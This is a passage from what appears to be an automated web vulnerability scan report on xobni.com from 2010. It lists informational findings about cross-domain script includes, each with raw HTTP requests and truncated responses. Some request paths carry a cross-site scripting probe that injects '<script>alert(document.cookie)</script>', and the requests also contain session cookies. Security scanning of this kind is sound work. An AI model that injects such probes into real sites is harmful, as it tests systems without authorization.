Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>LinkedIn in Outlo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.89. http://www.xobni.com/lp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /lp/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lp/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</h3>
       
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

12.90. http://www.xobni.com/lp/x1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /lp/x1/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lp/x1/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/fan
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Le plug-i
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.91. http://www.xobni.com/media/contextual_gadgets/hoovers/xobniHoovers.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /media/contextual_gadgets/hoovers/xobniHoovers.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media/contextual_gadgets/hoovers/xobniHoovers.xml HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/contextual_gadgets/hoovers/manifest.xml
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:42 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 21:52:41 GMT
ETag: "3b2084-1dbc-4870d97fb5c40"
Accept-Ranges: bytes
Content-Length: 7612
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Hoover's by Xobni"
description=""
height="45"
author="Dennis Quintela"
author_email="..."
author_location="San
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

12.92. http://www.xobni.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16307

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni pour BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.93. http://www.xobni.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/one/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni pour BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.94. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:20:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.95. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=56318370.535260956.1292274982.1292274982.1292274982.1

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:01:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 7805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.96. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile81ff6scriptalert(document.cookie)/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile81ff6scriptalert(document.cookie)/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.97. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8012

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.98. http://www.xobni.com/one

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /one

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /one HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni One - Conne
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.99. http://www.xobni.com/opensource/NsisDotNet/README.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /opensource/NsisDotNet/README.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /opensource/NsisDotNet/README.htm HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/about/opensource.php
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:37 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:15 GMT
ETag: "3b41dd-c51-477175e3000c0"
Accept-Ranges: bytes
Content-Length: 3153
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>This plugin for the NSIS install</title>
</h
...[SNIP]...
<!------------------ANALYTICS-------------------------->
<script src="http://www.google-analytics.com/urchin.js"
type="text/javascript">

</script>
...[SNIP]...

12.100. http://www.xobni.com/outlook-calendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /outlook-calendar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /outlook-calendar HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Search Outlook Ca
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.101. http://www.xobni.com/outlook-social-connector

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /outlook-social-connector

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /outlook-social-connector HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for Microso
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.102. http://www.xobni.com/partners

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.8.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10553

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.103. http://www.xobni.com/partners/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10598

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.104. http://www.xobni.com/partners/partners_content

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners/partners_content

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/partners_content HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13010

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.105. http://www.xobni.com/partners/partners_content.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners/partners_content.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/partners_content.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13022

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.106. http://www.xobni.com/partners/partners_signup.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /partners/partners_signup.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/partners_signup.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14792

